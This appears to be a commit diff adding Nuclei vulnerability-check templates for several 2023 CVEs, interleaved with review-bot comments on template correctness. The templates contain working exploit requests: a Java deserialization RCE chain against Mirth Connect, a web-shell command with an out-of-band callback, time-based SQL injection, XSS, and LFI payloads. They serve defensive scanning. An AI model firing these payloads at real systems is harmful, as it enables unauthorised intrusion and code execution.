- ',"static_token":"([0-9a-z]+)",'
|
||||
internal: true
|
||||
# digest: 4a0a00473045022100aa46ba83eaa1e937eb89a6c4296e4efd072af40a4bcf8e687f6f3ea2551ed66502204452a505bdad3d329e7fdb44f2aa4ad0a0be98e174650aed8a5f057d51935856:922c64590222798bb761d5b6d8e72950
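Review bot: The annotation in the second raw request is written `@timeout 10s` without a colon, whereas the Magento template added in this same commit uses `@timeout: 20s`. As written the line is likely not recognised as an annotation and may end up in the request text instead, so it should read `@timeout: 10s`. `max-request: 1` also under-counts, since the template issues a GET and then a POST; `max-request: 2` matches what is sent. The `description` says "affected versions" without naming any, which leaves the reader to follow the reference to learn whether an installation is exposed.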
|
|
@ -28,7 +28,7 @@ info:
|
|||
vendor: gitlab
|
||||
product: gitlab
|
||||
shodan-query: title:"Gitlab"
|
||||
tags: cve2023,cve,gitlab,lfi,kev,authenticated,intrusive
|
||||
tags: cve2023,cve,gitlab,lfi,authenticated,intrusive
|
||||
variables:
|
||||
data: "{{rand_base(5)}}"
|
||||
|
||||
|
@ -210,4 +210,4 @@ http:
|
|||
- '"url":"\/uploads\/([0-9a-z]+)\/'
|
||||
internal: true
|
||||
part: body
|
||||
# digest: 4a0a00473045022100fce13295307498034c0bfb69917e3f2561064c0812d5c1a8e27c0bcae996910102202f9c489427503620b35cc6d39d3bbc7826a351b2fd88f2c05ef19a5016ccfd70:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ce74731d4f03315a39203e3aa3775a80c5a82171b15cb8251c13b84816f869a502200e2fc502e7a3ab3a6d1d51fb7acb0c6a69777c3fb805501cc36ffdd30e3d4f27:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2023-32077
|
||||
|
||||
info:
|
||||
name: Netmaker - Hardcoded DNS Secret Key
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: high
|
||||
description: |
|
||||
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2023-32077
|
||||
cwe-id: CWE-321,CWE-798
|
||||
epss-score: 0.0006
|
||||
epss-percentile: 0.24707
|
||||
cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: gravitl
|
||||
product: netmaker
|
||||
shodan-query: html:"netmaker"
|
||||
tags: cve,cve2023,info-key,netmaker,exposure
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/dns"
|
||||
|
||||
headers:
|
||||
Authorization: "x secretkey"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "application/json")'
|
||||
- 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
|
||||
condition: and
|
||||
# digest: 490a00463044022044db0025b30ee01f7b653b83140795eaf85cb6c5037c5f592c309666b0191a660220208862f3f2eb0ddb3dcc357a3c4811cc439136e6f123760564c5c0cf2f9274ae:922c64590222798bb761d5b6d8e72950
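Review bot: The `info` block has neither `reference` nor `remediation`, even though the description already names the fixed releases. I would add `remediation: Upgrade to Netmaker 0.17.1, 0.18.6 or later.` and a `reference:` list with at least `- https://nvd.nist.gov/vuln/detail/CVE-2023-32077`, matching the other CVE templates in this commit. A one-line comment above `Authorization: "x secretkey"` stating that this is presumably the hardcoded key the CVE refers to would also help, because without it the value reads like a leftover placeholder.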
|
|
@ -32,7 +32,7 @@ info:
|
|||
framework: wordpress
|
||||
publicwww-query: /wp-content/plugins/ultimate-member
|
||||
google-query: inurl:/wp-content/plugins/ultimate-member
|
||||
tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan,ultimatemember
|
||||
tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember
|
||||
variables:
|
||||
username: "{{rand_base(6)}}"
|
||||
password: "{{rand_base(8)}}"
|
||||
|
@ -103,4 +103,4 @@ http:
|
|||
dsl:
|
||||
- '"WP_USERNAME: "+ username'
|
||||
- '"WP_PASSWORD: "+ password'
|
||||
# digest: 490a0046304402206de691d2a93e1cd2ec763fc23e63c832a45a349293a8504cbc6d66638dc8d5a20220675e13ca1913ab9e44aba22dfc133154bda77a3b8ff2c4bc6f1881208f49b802:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100b493c7d63335e4d391cb5cc16773998839c91742ebdca9ed34de149a896d8635022100dd6e41ff08a478312111f10087ecd9bcf0cab2c7596f13f55ced60e7ff2102bb:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2023-38964
|
||||
|
||||
info:
|
||||
name: Academy LMS 6.0 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.
|
||||
impact: |
|
||||
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
|
||||
remediation: |
|
||||
Apply the latest security patches provided by the vendor to mitigate the XSS vulnerability in Creative Item Academy LMS 6.0.
|
||||
reference:
|
||||
- https://vida03.gitbook.io/redteam/web/cve-2023-38964
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-38964
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-38964
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.15636
|
||||
cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: creativeitem
|
||||
product: academy_lms
|
||||
fofa-query: body="Academy LMS"
|
||||
tags: cve2023,cve,academylms,xss,creativeitem
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/home/courses?query="><svg+onload=alert(document.domain)>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains_all(body, "<svg onload=alert(document.domain)>", "All courses</span>")'
|
||||
condition: and
|
||||
# digest: 490a004630440220588a1a20171ed9e63186819de5ce752cf21132d717d03d74100877a2037385cf022007fb5a6ec93b218fd213ed4c152c786d03f8e6aae0ec8e2eaee9177460c173e0:922c64590222798bb761d5b6d8e72950
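Review bot: `matchers-condition: and` is set on a request that has only one matcher, and that matcher already carries its own `condition: and`, so the outer line has no effect and can be dropped. The other single-matcher templates added in this commit, for example the Netmaker one, omit it, so removing it keeps the set consistent. The `remediation` text is also generic and names no fixed release; if the vendor has published one, stating it there would be more useful than "apply the latest security patches".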
|
|
@ -0,0 +1,107 @@
|
|||
id: CVE-2023-43208
|
||||
|
||||
info:
|
||||
name: NextGen Healthcare Mirth Connect - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.
|
||||
impact: |
|
||||
Successful exploitation could result in unauthorized access and potential compromise of sensitive data.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
|
||||
- https://github.com/nvn1729/advisories
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-43208
|
||||
epss-score: 0.00349
|
||||
epss-percentile: 0.71422
|
||||
cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: nextgen
|
||||
product: mirth_connect
|
||||
shodan-query: title:"mirth connect administrator"
|
||||
tags: cve,cve2023,nextgen,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /api/server/version HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
X-Requested-With: OpenAPI
|
||||
- |
|
||||
POST /api/users HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
X-Requested-With: OpenAPI
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<string>abcd</string>
|
||||
<dynamic-proxy>
|
||||
<interface>java.lang.Comparable</interface>
|
||||
<handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
|
||||
<target class="org.apache.commons.collections4.functors.ChainedTransformer">
|
||||
<iTransformers>
|
||||
<org.apache.commons.collections4.functors.ConstantTransformer>
|
||||
<iConstant class="java-class">java.lang.Runtime</iConstant>
|
||||
</org.apache.commons.collections4.functors.ConstantTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>getMethod</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.String</java-class>
|
||||
<java-class>[Ljava.lang.Class;</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<string>getRuntime</string>
|
||||
<java-class-array/>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>invoke</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.Object</java-class>
|
||||
<java-class>[Ljava.lang.Object;</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<null/>
|
||||
<object-array/>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>exec</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.String</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
</iTransformers>
|
||||
</target>
|
||||
<methodName>transform</methodName>
|
||||
<eventTypes>
|
||||
<string>compareTo</string>
|
||||
</eventTypes>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
</sorted-set>
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'compare_versions(version, "<4.4.1")'
|
||||
- 'contains(interactsh_protocol, "dns")'
|
||||
- 'status_code_1 == 200 && status_code_2 == 500'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body_1
|
||||
name: version
|
||||
group: 1
|
||||
regex:
|
||||
- '(.*)'
|
||||
internal: true
|
||||
# digest: 4a0a0047304502206fe736214580619678b34e475a3c7fd97fa9c3bbd559bf1db7ac3d3724dd3832022100878eabed20ca61c94683b6daeb92fa1739f9893c5501986e8c77541479cd3adb:922c64590222798bb761d5b6d8e72950
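Review bot: The `version` extractor uses `'(.*)'` on `body_1`, so whatever the first request returns (an HTML error page, a proxy banner) is handed unchanged to `compare_versions(version, "<4.4.1")`. Anchoring it to a version shape, e.g. `- '^(\d+\.\d+\.\d+)'`, keeps the comparison meaningful and avoids silent non-matches on unexpected bodies. The `metadata` block also lacks `max-request: 2`. Because the second request runs a command on the target, the template probably belongs under the `intrusive` tag that other templates in this commit use.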
|
|
@ -0,0 +1,60 @@
|
|||
id: CVE-2023-44812
|
||||
|
||||
info:
|
||||
name: mooSocial v.3.1.8 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.
|
||||
impact: |
|
||||
Allows attackers to execute malicious scripts in the context of a user's browser session.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or upgrade to a version that addresses the XSS vulnerability.
|
||||
reference:
|
||||
- https://github.com/nomi-sec/PoC-in-GitHub
|
||||
- https://github.com/ahrixia/CVE-2023-44812
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-44812
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-44812
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00069
|
||||
epss-percentile: 0.28937
|
||||
cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: moosocial
|
||||
product: moosocial
|
||||
fofa-query: icon_hash="702863115"
|
||||
tags: cve2023,cve,moosocial,xss
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "mooSocial"
|
||||
internal: true
|
||||
case-insensitive: true
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100f555f0259ec83f340fb6efe6252abd7b67f304c538fe2d4bb5a46d4a3e7d209e022100f7db3b06b1e97e43235ec12bfd7dc548956be134f2728dc384fc52e4ed35af51:922c64590222798bb761d5b6d8e72950
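Review bot: The `metadata` block of this new template has no `max-request` or `verified` entry, although `flow: http(1) && http(2)` issues two requests. The other new templates in this commit that declare these fields let a user budget requests and tell tested checks from untested ones. I would add `max-request: 2` under `metadata`, and `verified: true` only if the check was run against a real mooSocial 3.1.8 instance. The same fields are missing from the CVE-2023-4521, CVE-2024-0235 and CVE-2024-22927 templates further down.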
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2023-4521
|
||||
|
||||
info:
|
||||
name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.
|
||||
impact: |
|
||||
Allows unauthenticated attackers to execute arbitrary code on the target system.
|
||||
remediation: |
|
||||
Update the Import XML and RSS Feeds WordPress Plugin to the latest version to mitigate the vulnerability.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/de2cdb38-3a9f-448e-b564-a798d1e93481
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-4521
|
||||
epss-score: 0.00156
|
||||
epss-percentile: 0.51418
|
||||
cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: mooveagency
|
||||
product: import_xml_and_rss_feeds
|
||||
framework: wordpress
|
||||
fofa-query: body="import-xml-feed"
|
||||
tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- 'Import XML and RSS Feeds'
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
# digest: 490a00463044022002d89f2b86a35aa84fbf049f2e5074005a9225a3532e05d405dcb474452f7dd10220583d87dc17b3e9d079f09e3e12275e8e07965a6f325121265f93559902e6cd3d:922c64590222798bb761d5b6d8e72950
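Review bot: The final matcher accepts any `dns` interaction, and the interactsh hostname travels in the URL query string. A proxy, WAF or logging pipeline that resolves hostnames seen in URLs could therefore produce the same callback without anything running on the server. The first request already fetches `readme.txt`, so the plugin version could be extracted there and required to be below 2.1.5 with `compare_versions`, which would also keep the second request away from patched sites. The second request also depends on one fixed file name under `uploads/`, so an outdated install where that file is absent will not be reported; a comment saying so would help triage.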
|
|
@ -0,0 +1,60 @@
|
|||
id: CVE-2023-45375
|
||||
info:
|
||||
name: PrestaShop PireosPay - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: high
|
||||
description: |
|
||||
In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||
reference:
|
||||
- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2023-45375
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.0005
|
||||
epss-percentile: 0.17639
|
||||
cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
vendor: 01generator
|
||||
product: pireospay
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
tags: cve,cve2023,sqli,prestashop,pireospay
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- status_code == 200
|
||||
- contains(body, "/modules/pireospay/")
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10
|
||||
POST /module/pireospay/validation HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- duration>=6
|
||||
- status_code == 302
|
||||
- contains(content_type, "text/html")
|
||||
condition: and
|
||||
# digest: 4a0a0047304502207f826adf0d940782fb53c8bc4a06f53a4735b9231586bf8c8b26306e06b521b0022100ebe60a3c7c67085fab3cb503a91f7b59e5bb9148ae8ec4682025a107d73c1285:922c64590222798bb761d5b6d8e72950
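Review bot: `@timeout: 10` in the second raw request has no unit, while the sibling CVE-2023-46347 template writes `@timeout: 10s`. As far as I know the annotation is parsed as a duration string, so the bare number may be ignored and the request could be cut off by the default timeout before the delay that `duration>=6` waits for. I would write `@timeout: 10s`. Separately, `max-request: 1` does not match the two requests that `flow: http(1) && http(2)` sends; `max-request: 2` would.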
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2023-46347
|
||||
|
||||
info:
|
||||
name: PrestaShop Step by Step products Pack - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||
reference:
|
||||
- https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
|
||||
- https://stack.chaitin.com/poc/detail/3977
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-46347
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00076
|
||||
epss-percentile: 0.31923
|
||||
cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: ndkdesign
|
||||
product: ndk_steppingpack
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
tags: cve,cve2023,sqli,prestashop,ndk_steppingpack
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- duration>=6
|
||||
- contains(content_type, "text/html")
|
||||
- contains(header, 'PrestaShop')
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950
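Review bot: Besides `duration>=6`, the only conditions are `contains(content_type, "text/html")` and `contains(header, 'PrestaShop')`, and neither is specific to the ndk_steppingpack module. Any PrestaShop site that takes six seconds to answer this POST, including a slow error page, is therefore reported as critical. A fingerprint request like the one the CVE-2023-45375 template uses would tie the result to the module being installed, assuming the module references its assets on the front page (to be confirmed on a test shop); `max-request` would then be 2. The CVE-2023-45375, CVE-2024-27956 and CVE-2024-2876 templates in this commit also rest on a single timing sample and would benefit from a comment telling the operator to re-run before trusting a hit.

```yaml
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "/modules/ndk_steppingpack/")
        condition: and
        internal: true

  # … unchanged: existing timed POST request and its dsl matchers …
```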
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2023-5003
|
||||
|
||||
info:
|
||||
name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure
|
||||
author: Kazgangap
|
||||
severity: high
|
||||
description: |
|
||||
The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
|
||||
remediation: Fixed in 4.1.10
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-5003
|
||||
- https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2023-5003
|
||||
epss-score: 0.00084
|
||||
epss-percentile: 0.35074
|
||||
cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: miniorange
|
||||
product: active_directory_integration_\/_ldap_integration
|
||||
framework: wordpress
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/ldap-authentication-report.csv"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ID"
|
||||
- "USERNAME"
|
||||
- "TIME"
|
||||
- "LDAP STATUS"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100bd156a20bbfa2b8fcbab364a68192646c450da886c638558ab7c88166483aa44022100d58dac4f441a368fc420c322d67aef9bfeecadc03665b62bf18dc363f7421566:922c64590222798bb761d5b6d8e72950
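Review bot: The `tags` line has `cve2023` but not `cve`, unlike the other CVE templates added in this commit, so a run filtered on the `cve` tag would skip this check. I would write `tags: cve,cve2023,wpscan,exposure,csv,ldap,wordpress,wp-plugin`. The word matcher also has no `part`, and `ID` and `TIME` are short enough to occur in almost any page, so the match effectively hinges on `LDAP STATUS` plus the 200 status. Adding `part: body` and a condition on the response content type would keep an HTML soft-404 page from matching.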
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2023-6389
|
||||
|
||||
info:
|
||||
name: WordPress Toolbar <= 2.2.6 - Open Redirect
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6389
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-6389
|
||||
cwe-id: CWE-601
|
||||
epss-score: 0.00097
|
||||
epss-percentile: 0.40297
|
||||
cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: abhinavsingh
|
||||
product: wordpress_toolbar
|
||||
publicwww-query: "/wp-content/plugins/wordpress-toolbar/"
|
||||
tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
|
||||
# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950
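Review bot: In the `cpe` value, `wordpress` sits in the tenth field after `cpe:2.3`, which is the target-hardware slot. The other WordPress plugin templates in this commit place it one field earlier, in target-software. If that is a transcription slip, the line should read `cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:wordpress:*:*`. `framework: wordpress` is also missing from `metadata`, unlike the neighbouring WordPress templates.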
|
|
@ -0,0 +1,56 @@
|
|||
id: CVE-2023-6989
|
||||
|
||||
info:
|
||||
name: Shield Security WP Plugin <= 18.5.9 - Local File Inclusion
|
||||
author: Kazgangap
|
||||
severity: critical
|
||||
description: |
|
||||
The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6989
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-6989
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00282
|
||||
epss-percentile: 0.68187
|
||||
cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: getshieldsecurity
|
||||
product: shield_security
|
||||
framework: wordpress
|
||||
publicwww-query: "/wp-content/plugins/wp-simple-firewall"
|
||||
tags: cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"dashboard_shield"'
|
||||
- '"shield_action"'
|
||||
- '"search_shield"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502204e4cce5ccdd9c3c04b71aa1cd58280c033c6855be762519af8ea28b91bf131ce022100e41638a64a0ddab0bd7492d519772ad577c9420c807c3f5c34cfc69d01b923c8:922c64590222798bb761d5b6d8e72950
